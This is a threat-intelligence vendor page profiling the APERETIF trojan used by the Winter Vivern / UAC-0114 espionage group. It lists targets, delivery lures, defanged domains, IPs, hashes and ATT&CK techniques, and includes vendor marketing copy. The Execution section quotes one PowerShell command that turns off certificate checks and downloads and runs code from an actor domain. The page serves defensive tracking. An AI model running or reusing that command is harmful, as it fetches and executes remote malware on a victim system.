APERETIF
APERETIF is a trojan malware family associated with the UAC-0114 / Winter Vivern espionage group. CERT-UA named the malware based on a development PDB path found in a sample. Reported APERETIF samples were PE32 executables written in Visual C++ with a compilation timestamp of May 2021. The malware automates collection of victim details, maintains access on compromised systems, and beacons to attacker-controlled infrastructure, including marakanas[.]com. Observed behavior includes use of PowerShell with whoami to beacon outbound and retrieve further instructions or downloads, including use of the HTTPS GET URI signatures.php?id=1. APERETIF was used in campaigns targeting government entities and related organizations, with Winter Vivern activity reported against government organizations in Ukraine, Poland, Lithuania, India, the Vatican, Slovakia, and Italy, as well as at least some private telecommunications organizations supporting Ukraine. Delivery tradecraft linked to the actor included phishing websites impersonating official government resources, malicious documents, fake virus-scan lures, and batch scripts disguised as virus scanners that triggered malware downloads from attacker-controlled servers. Compromised WordPress sites including applesaltbeauty[.]com and natply[.]com were used to host APERETIF payloads. The activity has been assessed as aligned with Russian and Belarusian interests, and one report notes APERETIF contains a code line described as typical of Russia-affiliated adversary behavior patterns. Known related infrastructure mentioned in the reporting includes marakanas[.]com, bugiplaysec[.]com, ocs-romastassec[.]com, ocspdep[.]com, security-ocsp[.]com, and troadsecow[.]com; associated IPs include 176.97.66[.]57, 179.43.187[.]175, 179.43.187[.]207, 195.54.170[.]26, and 80.79.124[.]135. Reported associated SHA1 hashes include f39b260a9209013d9559173f12fbc2bd5332c52a and a19d46251636fb46a013c7b52361b7340126ab27.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
One malware family of recent activity is APERETIF, named by CERT-UA based on the development PDB path inside the sample... APERETIF is a trojan, automating the collection of victim details, maintaining access, and beaconing outbound the actor-controlled domain marakanas[.]com.
Techniques & procedures
8 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueThe group made use of compromised WordPress websites to host the malware, such as with hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i and hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o serving as the download location for APERETIF during initial attack stages.
Initial Access
1 techniqueIn these attacks the threat actor made use of a macro-enabled Excel spreadsheet to infect the target.
Execution
3 techniquesWhen the threat actor seeks to compromise the organization beyond the theft of legitimate credentials, Winter Vivern tends to rely on shared toolkits, and the abuse of legitimate Windows tools.
powershell.exe -noexit -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; iex (new-object net.webclient).DownloadString('hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php')"
These samples align with the theme of attacks mimicking a virus scanner, presenting users with the fake scan results similar to the script loaders. | Recent campaigns demonstrate the group’s use of lures to initiate the infection process, utilizing batch scripts disguised as virus scanners to prompt downloads of malware from attacker-controlled servers.
Discovery
1 techniqueAs with the previous script, the trojan makes use of whomami within PowerShell in its initial activity to beacon outbound for further instructions and/or downloads.
Command and Control
2 techniquesAPERETIF is a trojan, automating the collection of victim details, maintaining access, and beaconing outbound the actor-controlled domain marakanas[.]com.
utilizing batch scripts disguised as virus scanners to prompt downloads of malware from attacker-controlled servers.
IOCs tracked for this family
14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A trojan used by Winter Vivern that collects victim details, maintains access, and beacons to actor-controlled infrastructure for further instructions or downloads. It was delivered via fake virus-scan themed lures and hosted on compromised WordPress sites.
APERETIF is a malware used by UAC-0114/Winter Vivern, likely for information stealing and exfiltration, and shows characteristics typical of Russian-affiliated threat actors.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.